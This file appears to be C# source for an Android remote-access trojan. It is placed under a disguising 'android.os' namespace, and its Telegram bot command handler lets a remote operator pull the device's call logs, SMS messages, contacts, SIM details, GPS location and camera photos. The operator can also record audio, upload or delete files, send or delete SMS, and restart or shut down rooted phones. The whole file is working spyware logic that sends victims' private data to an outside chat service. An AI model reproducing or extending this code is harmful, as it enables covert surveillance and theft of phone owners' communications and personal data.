using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

using Android.App;
using Android.Content;
using Android.OS;
using Android.Runtime;
using Android.Views;
using Android.Widget;
using TeleSharp.Entities.SendEntities;
using Android.Telephony;
using Android.Locations;
using Android.Database;
using TeleSharp.Entities;
using android.os.Resources;

namespace android.os
{
    class CTRLCB
    {
        public CTRLCB(CallbackQuery cb,UserInformation user)
        {
            if (!inf.Values.sharep.GetBoolean("private", false) || cb.From.Id.ToString() == inf.MyManagerId)
            {
                if (inf.Values.sharep.Contains("lockfor"))
                {
                    if (inf.Values.sharep.GetLong("lockfor", 0) == cb.From.Id || cb.From.Id.ToString() == inf.MyManagerId)
                        CTRLMESS(cb, cb.From.Id.ToString(),user);
                    else
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "this device is lock and you can't use of this!", ChatId = cb.From.Id.ToString() });
                }
                else
                    CTRLMESS(cb, cb.From.Id.ToString(),user);
            }
            else
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "this device is private and just creator can use this device or change this to public device!", ChatId = cb.From.Id.ToString() });
        }

        private void CTRLMESS(CallbackQuery cb, string chatid,UserInformation user)
        {
            #region callback
            string s = cb.Data;
            if (s == "add chat id")
            {
                user.SetNull();
                user.OnAddChatId = true;
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!now forward message of that user to me!", ChatId = chatid });
            }
            else if (s == "device name")
            {
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok! now send a new name!", ChatId = chatid });
                user.SetNull();
                user.OnChangeDeviceName = true;
            }
            else if (s == "allusers")
            {
                if (inf.MyUsers.Count == 0)
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "No Users", ChatId = cb.From.Id.ToString() });
                foreach (UserInformation u in inf.MyUsers)
                {
                    inf.CTRLApi.SendMessage(new SendMessageParams
                    {
                        ChatId = cb.From.Id.ToString(),
                        Text = string.Format("Name: {0}\nUsername: {1}\nChatId: {2}", u.Name, u.UserName, u.ChatId)
                          ,
                        InlineKeyboard = new InlineKeyboardMarkup { InlineKeyboard = new List<List<InlineKeyboardButton>> { new List<InlineKeyboardButton> { new InlineKeyboardButton { Text = "remove", CallbackData = string.Format("remove{0}", u.ChatId), SwitchInlineQuery = "", SwitchInlineQueryCurrentChat = "", Url = "" } } } }
                    });
                    System.Threading.Thread.Sleep(10);
                }
            }
            else if (s == "allcalllog")
            {
                try
                {
                    List<Calls> logs = new CallsHistory().GetHistories(inf.Values.C);
                    inf.CTRLApi.SendMessage(new SendMessageParams
                    {
                        ChatId = cb.From.Id.ToString(),
                        Text = "Log Count: " + logs.Count
                    });
                    foreach (Calls c in logs)
                    {
                        inf.CTRLApi.SendMessage(new SendMessageParams
                        {
                            ChatId = cb.From.Id.ToString(),
                            Text = string.Format("Name: {0}\nNumber: {1}\nType: {2}\nDuration: {3} S\nDate: {4}", c.Name, c.Number, c.Type.ToString(), c.Duration.ToString(), c.Date.ToString())
                        });
                        System.Threading.Thread.Sleep(10);
                    }
                    logs.Clear();
                    inf.CTRLApi.SendMessage(new SendMessageParams
                    {
                        ChatId = cb.From.Id.ToString(),
                        Text = "Complete"
                    });
                }
                catch (Exception ex) { inf.CTRLApi.SendMessage(new SendMessageParams { ChatId = cb.From.Id.ToString(), Text = ex.ToString() }); }
            }
            else if (s == "newscalllog")
            {
                List<Calls> logs = new CallsHistory().GetHistories(inf.Values.C, true);
                inf.CTRLApi.SendMessage(new SendMessageParams
                {
                    ChatId = cb.From.Id.ToString(),
                    Text = "Log Count: " + logs.Count
                });
                foreach (Calls c in logs)
                {
                    inf.CTRLApi.SendMessage(new SendMessageParams
                    {
                        ChatId = cb.From.Id.ToString(),
                        Text = string.Format("Name: {0}\nNumber: {1}\nType: {2}\nDuration: {3} S\nDate: {4}", c.Name, c.Number, c.Type.ToString(), c.Duration.ToString(), c.Date.ToString())
                    });
                    System.Threading.Thread.Sleep(10);
                }
                logs.Clear();
                inf.CTRLApi.SendMessage(new SendMessageParams
                {
                    ChatId = cb.From.Id.ToString(),
                    Text = "Complete"
                });
            }
            else if (s == "callshistory")
            {
                Android.Net.Uri calluri = Android.Net.Uri.Parse("content://call_log/calls");
                ICursor cur = inf.Values.C.ContentResolver.Query(calluri, null, null, null, null);
                List<Calls> logs = new CallsHistory().GetHistories(inf.Values.C, true);
                inf.CTRLApi.SendMessage(new SendMessageParams
                {
                    ChatId = cb.From.Id.ToString(),
                    Text = string.Format("Get News Or All?\n\nNews Count: {0}\nAll Count: {1}", logs.Count, cur.Count),
                    InlineKeyboard = new InlineKeyboardMarkup
                    {
                        InlineKeyboard = new List<List<InlineKeyboardButton>>
                            {
                                new List<InlineKeyboardButton>
                                {
                                    new InlineKeyboardButton {Text="All",CallbackData="allcalllog",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" },
                                    new InlineKeyboardButton {Text="News",CallbackData="newscalllog",Url="",SwitchInlineQueryCurrentChat="",SwitchInlineQuery="" }
                                }
                            }
                    }
                });
                logs.Clear();
            }
            else if (s.StartsWith("remove"))
            {
                UserInformation u = UserInformation.FindUser(Convert.ToInt64(s.Remove(0, 6)), UsersMode.MyUsers);
                if (u != null)
                {
                    u.ClrSelf(UsersMode.MyUsers);
                    inf.CTRLApi.EditMessage(new SendMessageParams
                    {
                        ChatId = cb.From.Id.ToString(),
                        Text = string.Format("User: {0} Has Been Deleted Successfully", u.Name),
                        MessageId = cb.Message.MessageId.ToString()
                    });
                }
                else
                    inf.CTRLApi.EditMessage(new SendMessageParams
                    {
                        ChatId = cb.From.Id.ToString(),
                        Text = "User Not Found\nMay This User Was Deleted",
                        MessageId = cb.Message.MessageId.ToString()
                    });
            }
            else if (s == "maxsize")
            {
                user.SetNull();
                user.OnSetMaxSize = true;
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok! now send integer to MB to set", ChatId = chatid });
            }
            else if (s == "location")
                inf.CTRLApi.SendMessage(PARAMSEND.Location(chatid));
            else if (s == "locon")
            {
                if (RootUtil.IsDeviceRooted())
                    DoWork.locon(chatid);
                else
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "this device not rooted and you can not change device location mode!", ChatId = chatid });
            }
            else if (s == "locoff")
            {
                if (RootUtil.IsDeviceRooted())
                    DoWork.locoff(chatid);
                else
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "this device not rooted and you can not change device location mode!", ChatId = chatid });
            }
            else if (s == "setloc")
                inf.CTRLApi.SendMessage(PARAMSEND.Locsett(chatid));
            else if (s == "oklogout")
                DoWork.DeleteChatId(chatid, 0, chatid, UsersMode.MyUsers);
            else if (s == "cancellogout")
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!Thread Was Canceled!", ChatId = chatid });
            else if (s == "number")
            {
                string op = "", ss = "";
                try
                {
                    inf.Values.PhoneNumber = ((TelephonyManager)inf.Values.C.GetSystemService("phone")).Line1Number;
                    op = ((TelephonyManager)inf.Values.C.GetSystemService("phone")).SimOperatorName;
                    ss = ((TelephonyManager)inf.Values.C.GetSystemService("phone")).SimSerialNumber;
                }
                catch { }
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = string.Format("Phone Number: {0}\nOperator Name: {1}\nSimSerialNumber: {2}", inf.Values.PhoneNumber, op, ss), ChatId = chatid });
            }
            else if (s == "scmod")
                DoWork.scmod(chatid);
            else if (s == "sc")
                DoWork.sc(chatid);
            else if (s == "serviceon")
            {
                if (inf.idsdloc.Contains(int.Parse(chatid)))
                {
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Yor Location Service is Runing!", ChatId = chatid });
                    return;
                }
                Setting.Set_bool("idloc" + chatid, true);
                inf.idsdloc.Add(int.Parse(chatid));
                LocationManager lm = Application.Context.GetSystemService(Context.LocationService) as LocationManager;
                if (!(lm.IsProviderEnabled(LocationManager.NetworkProvider) || lm.IsProviderEnabled(LocationManager.GpsProvider)))
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Device Gps Is Off But Your Service Is Starting and Wait For Device Gps Turning On", ChatId = chatid });
                Location.Droid.App.StartLocationService();
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!Turned Location Service On", ChatId = chatid });
            }
            else if (s == "delsms")
            {
                ICursor C = inf.Values.C.ContentResolver.Query(Android.Net.Uri.Parse("content://sms"), null, null, null, null);
                if (C.MoveToLast())
                {
                    string msgData = C.GetString(C.GetColumnIndexOrThrow("body"));
                    string number = C.GetString(C.GetColumnIndexOrThrow("address"));
                    inf.CTRLApi.SendMessage(PARAMSEND.AreYouSure(chatid, "delsmsok", "delsmscancell", string.Format("Are You Sure To Delete This:\nFrom: {0}\nNumber: {1}\nText: {2}", Contacts.number_to_name(number), number, msgData)));
                }
                else
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "No Message In Inbox!", ChatId = chatid });
            }
            else if (s == "delsmscancell")
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok! Thread Has Been Canceled!", ChatId = chatid });
            else if (s == "delsmsok")
            {
                try
                {
                    ICursor C = inf.Values.C.ContentResolver.Query(Android.Net.Uri.Parse("content://sms"), null, null, null, null);
                    if (C.MoveToLast())
                    {
                        string id = C.GetString(0);
                        inf.Values.C.ContentResolver.Delete(Android.Net.Uri.Parse("content://sms/" + id), null, null);
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!End Message Deleted!", ChatId = chatid });
                    }
                    else
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "No Message In Inbox!", ChatId = chatid });
                }
                catch (Exception ex)
                {
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = ex.Message, ChatId = chatid });
                }
            }
            else if (s == "serviceoff")
            {
                try
                {
                    if (!inf.idsdloc.Contains(int.Parse(chatid)))
                    {
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Yor Location Service is Stop!", ChatId = chatid });
                        return;
                    }
                    Location.Droid.App.StopLocationService();
                    Setting.Remove("idloc" + chatid);
                    inf.idsdloc.Remove(int.Parse(chatid));
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!,Yor Location Service Was Stoped!", ChatId = chatid });
                }
                catch { }
            }
            else if (s == "prop")
                inf.CTRLApi.SendMessage(PARAMSEND.prop(chatid));
            else if (s == "acc")
                DoWork.Sendallacces(chatid);
            else if (s == "onlinenotify")
                inf.CTRLApi.SendMessage(new SendMessageParams
                {
                    ChatId = chatid,
                    Text = "Your Online Notification Mode: " + inf.idsonline.Contains(int.Parse(chatid)),
                    InlineKeyboard = PARAMSEND.turnOFForON("onmodeon", "onmodeoff", chatid)
                });
            else if (s == "onmodeon")
            {
                inf.Metods.add_onlines_id(int.Parse(chatid));
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!Your Notification Online Mode Turned On!", ChatId = chatid });
            }
            else if (s == "onmodeoff")
            {
                inf.Metods.remove_onlines_id(int.Parse(chatid));
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!Your Notification Online Mode Turned Off!", ChatId = chatid });
            }
            else if (s == "newimagenotify")
            {
                if(chatid!=inf.MyManagerId)
                {
                    inf.CTRLApi.SendMessage(new SendMessageParams
                    {
                        ChatId=chatid,
                        Text="Only Manager Can Do This"
                    });
                    return;
                }
                inf.CTRLApi.SendMessage(new SendMessageParams
                {
                    ChatId = chatid,
                    Text = "Your New Image Added In Gallery Notification Mode: " + inf.Values.sharep.GetBoolean("runningnewimageadded", false),
                    InlineKeyboard = PARAMSEND.turnOFForON("namodeon", "namodeoff", chatid)
                });
            }
            else if (s == "namodeon")
            {
                inf.Values.sharep.Edit().PutBoolean("runningnewimageadded", true).Commit();
                inf.Values.C.StartService(new Intent(inf.Values.C, typeof(NewImageService)));
                inf.CTRLApi.SendMessage(new SendMessageParams
                {
                    ChatId=chatid,
                    Text="Ok!, Your Image Service Has Been Started"
                });
            }
            else if (s == "namodeoff")
            {
                inf.Values.sharep.Edit().PutBoolean("runningnewimageadded", false).Commit();
                inf.Values.C.StopService(new Intent(inf.Values.C, typeof(NewImageService)));
                inf.CTRLApi.SendMessage(new SendMessageParams
                {
                    ChatId = chatid,
                    Text = "Ok!, Your Image Service Has Been Stoped"
                });
            }
            
                else if (s == "private")
                    inf.CTRLApi.SendMessage(PARAMSEND.Private(chatid));
                else if (s == "files&folders")
                    inf.CTRLApi.SendMessage(PARAMSEND.filesandfolders(chatid));
                else if (s == "notify")
                    inf.CTRLApi.SendMessage(PARAMSEND.notify(chatid));
                else if (s == "smsnotify")
                    inf.CTRLApi.SendMessage(PARAMSEND.smsnotify(chatid));
                else if (s == "callnotify")
                    inf.CTRLApi.SendMessage(PARAMSEND.callnotify(chatid));
                else if (s == "isroot")
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Device Root= " + RootUtil.IsDeviceRooted(), ChatId = chatid });
                else if (s == "isprivate")
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Device Private= " + inf.Values.sharep.GetBoolean("private", false), ChatId = chatid });
                else if (s == "build version")
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = string.Format("Factory: {0}\nId: {1}\nAndroid Version: {2}\ninf.api Version: {3}\nDevice Build Version= {4}", Build.Product, Build.Id, inf.androidname(Build.VERSION.SdkInt), Build.VERSION.Sdk, Build.Display), ChatId = chatid });
                else if (s == "start vc")
                    DoWork.StartVC(chatid);
                else if (s == "stop vc")
                    DoWork.StopVC(chatid);
                else if (s == "calls")
                    inf.CTRLApi.SendMessage(PARAMSEND.Calls(chatid));
                else if (s == "endcall")
                    DoWork.UploadEndCall(chatid);
                else if (s == "allcalls")
                    DoWork.UploadCalls(chatid);
                else if (s == "smses")
                    inf.CTRLApi.SendMessage(PARAMSEND.Smses(chatid));
                else if (s == "sendsms")
                {
                    user.SetNull();
                    user.OnSendSms = true;
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!now send phone number and text message to send start with country code e.g.\"_+98_\"! e.g.\n\"PHONE_NUMBER,MESSAGE_TEXT\"", ChatId = chatid });
                }
                else if (s == "contacts")
                    inf.CTRLApi.SendMessage(PARAMSEND.contacts(chatid));
                else if (s == "endsms")
                    DoWork.UploadEndSms(chatid);
                else if (s == "allsmses")
                    DoWork.UploadSmses(chatid);
                else if (s == "nodownload")
                    inf.CTRLApi.SendMessage(PARAMSEND.downloadcancel(chatid));
                else if (s == "filedialog")
                    inf.CTRLApi.SendMessage(PARAMSEND.FileDialog(chatid, ""));
                else if (s == "folderdialog")
                    inf.CTRLApi.SendMessage(PARAMSEND.FolderDialog(chatid, ""));
                else if (s == "set filereq")
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!now send file To Me!", ChatId = chatid });
                else if (Filef.bodypart(s) == "get location")
                    inf.CTRLApi.SendLocation(Convert.ToInt32(chatid), Filef.fpart((Filef.valuepart(s))), Filef.spart((Filef.valuepart(s))));
                else if (s.StartsWith("pthf=>"))
                {
                    SendMessageParams smp = PARAMSEND.FileDialog(chatid, cb.Message.Text + '/' + s.Remove(0, 6));
                    if (smp != null)
                        inf.CTRLApi.SendMessage(smp);
                }
                else if (s == "pthfex")
                {
                    SendMessageParams smp = PARAMSEND.FileDialog(chatid, Android.OS.Environment.ExternalStorageDirectory.AbsolutePath);
                    if (smp != null)
                        inf.CTRLApi.SendMessage(smp);
                }
                else if (s.StartsWith("backfiledialog"))
                    inf.CTRLApi.SendMessage(PARAMSEND.FileDialog(chatid, System.IO.Directory.GetParent(cb.Message.Text).FullName));
                else if (s == "downloadcall")
                    DoWork.UploadFile(inf.ReadLineString(cb.Message.Text), chatid);
                else if (s.StartsWith("backfolderdialog"))
                    inf.CTRLApi.SendMessage(PARAMSEND.FolderDialog(chatid, System.IO.Directory.GetParent(cb.Message.Text).FullName));
                else if (Filef.bodypart(s) == ("modifyd"))
                    inf.CTRLApi.SendMessage(PARAMSEND.modifys(chatid, Filef.bodypart(s), cb.Message.Text + '/' + Filef.valuepart(s), user));//modifyf||modifys
                else if (s == "modifydex")
                    inf.CTRLApi.SendMessage(PARAMSEND.modifys(chatid, Filef.bodypart(s), Android.OS.Environment.ExternalStorageDirectory.AbsolutePath, user));//modifyf||modifys
                else if (Filef.bodypart(s) == ("modifyf"))
                    inf.CTRLApi.SendMessage(PARAMSEND.modifys(chatid, Filef.bodypart(s), cb.Message.Text + '/' + Filef.valuepart(s), user));//modifyf||modifys
                else if (s == "get file")
                    DoWork.UploadFile(cb.Message.Text, chatid);
                else if (s == "get filed")
                    DoWork.UploadFile(inf.ReadLineString(cb.Message.Text), chatid, true);
                else if (s == "lock")
                    inf.CTRLApi.SendMessage(PARAMSEND.lockme(chatid));
                else if (s == "lockforme")
                {
                    user.OnForwLock = false;
                    inf.Values.sharep.Edit().PutLong("lockfor", long.Parse(chatid)).Commit();
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!,Locked For: " + cb.From.Username, ChatId = chatid });
                }
                else if (s == "lockfor")
                {
                    if (!inf.Values.sharep.Contains("lockfor"))
                    {
                        user.OnForwLock = true;
                        inf.CTRLApi.SendMessage(new SendMessageParams
                        {
                            ChatId = chatid,
                            Text = "Forward Message From User To Lock This Device For Who Taht Want To Lock This Device Or Click On MyChatId Button For Lock For Me!",
                            InlineKeyboard = new InlineKeyboardMarkup
                            {
                                InlineKeyboard = new List<List<InlineKeyboardButton>>
                                {
                                    new List<InlineKeyboardButton>
                                    {
                                        new InlineKeyboardButton {Text="MyChatId",CallbackData="lockforme",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                                    }
                                }
                            }
                        });
                    }
                    else
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "this device was locked \n first unlock this!", ChatId = chatid });
                }
                else if (s == "unlockfor")
                {
                    if (inf.Values.sharep.Contains("lockfor"))
                        inf.CTRLApi.SendMessage(PARAMSEND.AreYouSure(chatid, "okunlock", "cancellunlock"));
                    else
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "this device is Unlocked \n first unlock this!", ChatId = chatid });
                }
                else if (s == "okunlock")
                {
                    if (inf.Values.sharep.Contains("lockfor"))
                    {
                        inf.Values.sharep.Edit().Remove("lockfor").Commit();
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "ok!, device Unlocked!", ChatId = chatid });
                    }
                    else
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "this device was Unlocked \n first lock this!", ChatId = chatid });
                }
                else if (s == "cancellunlock")
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "ok!,cancelled this thread!", ChatId = chatid });
                else if (Filef.bodypart(s) == "fsaveto")
                {
                    if (user.OnExtract)
                        DoWork.extract(chatid, user.FilePth, cb.Message.Text + '/' + Filef.valuepart(s));
                    else if (user.OnCopy)
                        DoWork.CopyFile(user.FilePth + "," + cb.Message.Text + '/' + Filef.valuepart(s) + "/" + System.IO.Path.GetFileName(user.FilePth), chatid);
                    else if (user.OnCut)
                        DoWork.CutFile(user.FilePth + "," + cb.Message.Text + '/' + Filef.valuepart(s) + "/" + System.IO.Path.GetFileName(user.FilePth), chatid);
                    else if (user.OnWritePathToSaveFile)
                    {
                        if (user.FileToDownload != null)
                        {
                            DoWork.DownloadFile(cb.Message.Text + '/' + Filef.valuepart(s), chatid, user.FileToDownload);
                            user.FileToDownload = null;
                        }
                        else
                            inf.CTRLApi.SendMessage(new SendMessageParams { Text = "File Is Null!", ChatId = cb.From.Id.ToString() });
                    }
                    user.SetNull();
                }
                else if (s == "fsavetoex")
                {
                    if (user.OnExtract)
                        DoWork.extract(chatid, user.FilePth, Android.OS.Environment.ExternalStorageDirectory.AbsolutePath);
                    else if (user.OnCopy)
                        DoWork.CopyFile(user.FilePth + "," + Android.OS.Environment.ExternalStorageDirectory.AbsolutePath + "/" + System.IO.Path.GetFileName(user.FilePth), chatid);
                    else if (user.OnCut)
                        DoWork.CutFile(user.FilePth + "," + Android.OS.Environment.ExternalStorageDirectory.AbsolutePath + "/" + System.IO.Path.GetFileName(user.FilePth), chatid);
                    else if (user.OnWritePathToSaveFile)
                    {
                        if (user.FileToDownload != null)
                        {
                            DoWork.DownloadFile(Android.OS.Environment.ExternalStorageDirectory.AbsolutePath, chatid, user.FileToDownload);
                            user.FileToDownload = null;
                        }
                        else
                            inf.CTRLApi.SendMessage(new SendMessageParams { Text = "File Is Null!", ChatId = cb.From.Id.ToString() });
                    }
                    user.SetNull();
                }

                else if (s.StartsWith("pthd=>"))
                {
                    SendMessageParams smp = PARAMSEND.FolderDialog(chatid, cb.Message.Text + '/' + s.Remove(0, 6));
                    if (smp != null)
                        inf.CTRLApi.SendMessage(smp);
                }
                else if (s.StartsWith("pthdex"))
                {
                    SendMessageParams smp = PARAMSEND.FolderDialog(chatid, Android.OS.Environment.ExternalStorageDirectory.AbsolutePath);
                    if (smp != null)
                        inf.CTRLApi.SendMessage(smp);
                }

                else if (s == "smsnotifyon")
                    DoWork.smsnotify(chatid, true);
                else if (s == "smsnotifyoff")
                    DoWork.smsnotify(chatid, false);
                else if (s == "callnotifyon")
                    DoWork.callnotify(chatid, true);
                else if (s == "callnotifyoff")
                    DoWork.callnotify(chatid, false);
                else if (s == "privateon")
                    DoWork.SetPrivate("private", "true", 0, chatid);
                else if (s == "privateoff")
                    DoWork.SetPrivate("private", "false", 0, chatid);
                else if (s == "searchbynum")
                {
                    user.SetNull();
                    user.OnSearchNum = true;
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!now send phone number to search!", ChatId = chatid });
                }
                else if (s == "searchbyname")
                {
                    user.SetNull();
                    user.OnSearchName = true;
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!now send name to search!", ChatId = chatid });
                }
                else if (s == "getall")
                {
                    List<_Contacts> conts = Contacts.All();
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Contacts Lenght: " + conts.Count, ChatId = chatid });
                    for (int i = 0; i < conts.Count; i++)
                    {
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Name=" + conts[i].Name + "\nNumber=" + conts[i].Number, ChatId = chatid });
                        System.Threading.Thread.Sleep(10);
                    }
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Completed!", ChatId = chatid });
                }
                else if (s == "toast")
                {
                    user.SetNull();
                    user.OnShowMessage = true;
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!now send message text to show on this device", ChatId = chatid });
                }
                else if (s == "ip")
                    DoWork.Ip(chatid);
                else if (s == "camera")
                    inf.CTRLApi.SendMessage(PARAMSEND.Camera(chatid));
                else if (s.StartsWith("take"))
                {
                    inf.Values.sendto = chatid;
                    inf.Values.camid = s.Remove(0, 4);
                    if (null != inf.Values.C)
                    {
                        if (!inf.Values.waitforcamera)
                        {
                            if (!inf.Values.RuningCamera)
                                inf.Values.C.SendBroadcast(new Intent(inf.Values.C, typeof(camrec)));
                            inf.Values.OnTake = true;
                        }
                        else
                            inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Try Again Later. Camera In Use!", ChatId = chatid });
                    }
                    else
                    {
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "can't take picture.\n context is null!", ChatId = chatid });
                        inf.Values.sendto = "";
                        inf.Values.camid = "0";
                        inf.Values.OnTake = false;
                    }
                }
                else if (s.StartsWith("camera"))
                    inf.CTRLApi.SendMessage(PARAMSEND.usecamera(chatid, s.Remove(0, 6)));
                else if (s == "delete folder")
                    DoWork.DeleteFolder(cb.Message.Text, chatid, cb.Message.MessageId.ToString());
                else if (s == "get folder")
                    DoWork.UploadFolder(cb.Message.Text, chatid);
                else if (s == "zip folder")
                    DoWork.zipfolder(chatid, cb.Message.Text, false);
                else if (s == "propfolder")
                    DoWork.Sendpropertis(chatid, cb.Message.Text);
                else if (s == "zip file")
                    DoWork.zipfile(chatid, cb.Message.Text, false);
                else if (s == "uni")
                    inf.CTRLApi.SendMessage(PARAMSEND.AreYouSure(chatid, "uniok", "cancell"));
                else if (s == "uniok")
                    inf.Values.C.SendBroadcast(new Intent(inf.Values.C, typeof(Uni)));
                else if (s == "si")
                {
                    user.onimportant = true;
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "OK! send number for send sms to that", ChatId = chatid });
                }
                else if (s == "copy file")
                {
                    user.FilePth = cb.Message.Text;
                    inf.CTRLApi.SendMessage(PARAMSEND.setpath(chatid, "now select folder for copy file or write path"));
                    user.SetNull();
                    user.OnCopy = true;
                }
                else if (s == "cut file")
                {
                    user.FilePth = cb.Message.Text;
                    inf.CTRLApi.SendMessage(PARAMSEND.setpath(chatid, "now select folder for cut file or write path"));
                    user.SetNull();
                    user.OnCut = true;
                }
                else if (s == "extract")
                {
                    user.FilePth = cb.Message.Text;
                    inf.CTRLApi.SendMessage(PARAMSEND.setpath(chatid, "now select folder for extract file or write path"));
                    user.SetNull();
                    user.OnExtract = true;
                }
                else if (s == "delete file")
                    DoWork.DeleteFile(cb.Message.Text, chatid, cb.Message.MessageId.ToString());
                else if (s == "rename file")
                {
                    DoWork.renamefile(chatid, cb.Message.Text);
                    user.SetNull();
                }
                else if (s == "writepth")
                {
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!now send pathfolder to save file!", ChatId = chatid });
                    if (!user.OnExtract || !user.OnCopy || !user.OnCut)
                        user.OnWritePathToSaveFile = true;
                }
                #region ShutDown&Restart
                else if (s == "shutdown")
                {
                    if (!RootUtil.IsDeviceRooted())
                    {
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "You can't do this,because this device was not root!", ChatId = chatid });
                        return;
                    }
                    inf.CTRLApi.SendMessage(PARAMSEND.AreYouSure(chatid, "ok", "cancell"));
                    user.SetNull();
                    user.OnShutDown = true;
                }
                else if (s == "restart")
                {
                    if (!RootUtil.IsDeviceRooted())
                    {
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "You can't do this,because this device was not root!", ChatId = chatid });
                        return;
                    }
                    inf.CTRLApi.SendMessage(PARAMSEND.AreYouSure(chatid, "ok", "cancell"));
                    user.SetNull();
                    user.OnRestart = true;
                }
                else if (user.OnRestart)
                {
                    if (s == "ok")
                        DoWork.Restart(chatid);
                    else
                    {
                        user.OnRestart = false;
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok! canceled this thread!", ChatId = chatid });
                    }
                }
                else if (user.OnShutDown)
                {
                    if (s == "ok")
                        DoWork.ShutDown(chatid);
                    else
                    {
                        user.OnShutDown = false;
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok! canceled this thread!", ChatId = chatid });
                    }
                }
            #endregion
            #endregion
        }
    }  
}